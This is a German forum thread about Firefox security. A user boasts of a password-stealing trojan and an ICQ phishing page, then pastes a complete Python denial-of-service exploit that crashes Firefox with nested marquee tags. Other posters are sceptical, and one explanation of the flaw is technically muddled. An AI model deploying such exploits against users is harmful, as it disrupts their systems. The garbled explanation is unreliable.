hi & sicherheit^^

unnex

hey leutz ich wollt ma hallo sagen^^
und bei der gelegenheit gleich mal fragen was ihr von der sicherheit
von firefox haltet... ?

hab aus langerweile en trojaner gebastelt der die passwoerter vom firefox 2.0.0.1-2.0.0.3 ausliest...
is erschreckend einfach gewesen...

wer den quelltext moechte und auch nen driftigen grund hat kann sich ja bei mir per pn melden...

wie siehts aus gibts schon anzeichen fuer en neues firefox update das dass basten von solchen trojans erschwaert ?

bugcatcher

Zitat von unnex

wie siehts aus gibts schon anzeichen fuer en neues firefox update das dass basten von solchen trojans erschwaert ?

Wer einen Trojaner auf dem Rechner hat, kann mit Sicherheit eh einpacken. Denn sobald irgend ein Programm Adminrechte hat, kann es machen was es will. Und dazu gehört auch Passwortdateien auszuhebeln Dagegen hilft auch nix.

Wenn Du wirklich Interesse hast dem Projekt zu helfen, dann kannst Du den Entwicklern ja mal Deinen Trojaner zur Verfügung stellen. Die findest Du aber nicht hier, sondern bei mozillazine.org bzw. bugzilla.mozilla.org.

Eine Diskussion zu dem Thema erübrig sich in meinen Augen. Außer natürlich, Du konntest Firefox dazu nutzen den Trojaner aufs System zu bekommen. Aber auch dann solltest Du das mit den Entwicklern und nicht hier besprechen.

UliBär

...und ich hab 'ne Firefox-Erweiterung, die Kaffee kochen kann. :lol:

[Blockierte Grafik: http://img297.imageshack.us/img297/3593/spamgj2.png]

bugcatcher

Das war auch mein erster Gedanke. Zumindest die Signatur sollte man entfernen. ; )

Coce

Die Seite, auf der das Bild aus der Signatur liegt, dient wohl dazu, an die Nutzerdaten von ICQ-Nutzern zu kommen :roll:

bugcatcher

Ansonsten halt nur um Leute ins Forum zu bekommen. Selbstpromoting.

Simon1983

Das Bild in der Signatur ist auch noch aus einer Serie geklaut :lol: .

http://www.eyes-only-online.net/
http://www.eyes-only-online.net/gallery/displayimage.php?pos=-203

unnex

die icq page is aus langerweile entstanden wie so vieles hab se ja nich zur schau gestellt muss ja keiner drauf rein fallen^^

naja hab ja nich gesagt das ich an dem projekt helfen moechte oder...usw
hab ja nur nach eurer meinung gefragt was ihr davon haltet...
achja der trojaner hat keine rootrechte der die braucht er bei firefox auch nicht^^ ahja und^^ bin nich darauf aus nur werbung zu machen XD

naja was ich zur frage bringen wollte gibt es oder wird es was geben um sich einfach gegen solche dinge zu schuetzen... ? sind ja nich nur trojans auch exploits... usw nur mal ein beispiel:

HTML

#usr/bin/python


print "-------------------------------------------------------------------------"
print " Mozilla Firefox 2.0.0.3 and Gran Paradiso 3.0a3 Denial of Service"
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " For convenience I post up a script in python that create a .html file"
print " You can open it locally, upload and browse it or directely browse here:\n"
print " http://www.shinnai.altervista.org/ff_dos.html\n"
print " Firefox 2 stops to answer, Gran Paradiso crahses\n"
print " To avoid confusion, this is based on <marquee> idea but it's not the"
print " same exploit. Take a look here to see differences"
print " http://www.milw0rm.com/exploits/1867"
print "-------------------------------------------------------------------------"


tagHtml = "<html>"
tagHtmlC = "</html>"
tagHead = "<head>"
tagHeadC = "</head>"
tagTitle = "<title>"
tagTitleC = "</title>"


buff= "<marquee>" * 160


boom = tagHtml + buff + tagHead + tagTitle + tagTitleC + tagHeadC + tagHtmlC


try:
    fileOut = open('ff_dos.html','w')
    fileOut.write(boom)
    fileOut.close()
    print "\nFILE ff_dos.html CREATED!\n'NJOY IT...\n"
except:
    print "\nUNABLE TO CREATE FILE ff_dos.html!\n"

Alles anzeigen

Oliver222

unnex stellte dar:

Zitat

naja was ich zur frage bringen wollte gibt es oder wird es was geben um sich einfach gegen solche dinge zu schuetzen... ? sind ja nicht nur trojans auch exploits... usw nur mal ein beispiel:

user_pref("capability.policy.default.HTMLDocument.title.set","noAccess") Eintrag in der "prefs.js". Das Problem ist nicht neu - Du kannst Dich selber schützen, sofern wir Dein Anliegen hier ernst nehmen dürfen.

Stichwort: Ausnutzung von JavaScript basierten Umgebungsvariablen, die bei Verarbeitung von überdimensionierten Binärdateien, übersetzt in gewöhnlichen HTML-Code, den Firefox bloss einfrieren lassen. Solche "Bash-Scripte" können, soweit ich hier informiert bin, auch über einen Buffer-Overflow clientseitig keine schädlichen Code-Executions anstossen - schon gar nicht dann, wenn der Nutzer innerhalb seines OS mit eingeschränkten Konto-Rechten arbeitet - was als Voraussetzung gelten sollte.

Oliver